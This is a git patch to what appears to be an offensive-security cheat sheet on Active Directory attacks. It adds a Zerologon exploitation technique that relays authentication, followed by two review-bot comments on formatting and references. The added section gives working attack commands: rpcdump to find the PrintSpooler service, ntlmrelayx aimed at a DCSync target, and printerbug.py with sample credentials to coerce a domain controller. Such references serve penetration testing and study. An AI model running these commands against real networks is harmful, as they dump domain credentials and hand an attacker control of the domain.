From 8caba394d5d203b007994fcde45157421d09d613 Mon Sep 17 00:00:00 2001 From: Darktortue Date: Tue, 10 Jan 2023 11:23:45 +0100 Subject: [PATCH] Added zerologon authentication relay technique --- .../Active Directory Attack.md | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f3d8eba..86f962d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -661,6 +661,26 @@ Exploit steps from the white paper ```powershell crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon ``` + +A 2nd approach to exploit zerologon is done by relaying authentication. + +This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity. +The following prerequisites are needed: +* A domain account +* One DC running the `PrintSpooler` service +* Another DC vulnerable to zerologon + +* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) + ```powershell + # Check if one DC is running the PrintSpooler service + rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv" + + # Setup ntlmrelay in one shell + ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support + + #Trigger printerbug in 2nd shell + python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 + ``` #### PrintNightmare 
@@ -4148,4 +4168,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) -* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
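Review bot: the prerequisites list in the new Zerologon relay section is split by the blank line before the `ntlmrelayx` bullet, and the indented ```powershell fence under that bullet does not match the unindented fences used elsewhere in this section (see the `crackmapexec` block immediately above); remove the blank line so the tools bullet stays in the same list, and either unindent the fence or nest it consistently. Within the block, `#Trigger printerbug in 2nd shell` should be `# Trigger printerbug in 2nd shell` to match the other comments. The three hosts in the commands (`10.10.10.10`, `DC01.LAB.LOCAL`, `10.10.10.12`) are never tied back to the prerequisites; a comment stating which placeholder is the DC running `PrintSpooler`, which is the vulnerable DC that ntlmrelayx targets, and which is the host running the relay listener would make the example readable. Finally, "A 2nd approach to exploit zerologon is done by relaying authentication." reads awkwardly and the claim of "no impact on service continuity" is left unexplained; suggest "A second way to exploit Zerologon is to relay authentication." and one clause, taken from the linked dirkjanm post, saying that this variant does not reset the domain controller's machine account password, which is the reason it avoids the service disruption of the approach above.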
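Review bot: the only change in the references hunk is adding the missing trailing newline to the last entry, which is fine but unrelated to the commit subject; the real gap is that the dirkjanm post linked inline in the new Zerologon section is not added to this references list, although the rest of the document records its sources here in `[Title - date - author](url)` form. Add an entry such as `* [A different way of abusing Zerologon - dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon)` (and the `printerbug.py` repository link, if tool links are kept here) so the section follows the document's own convention.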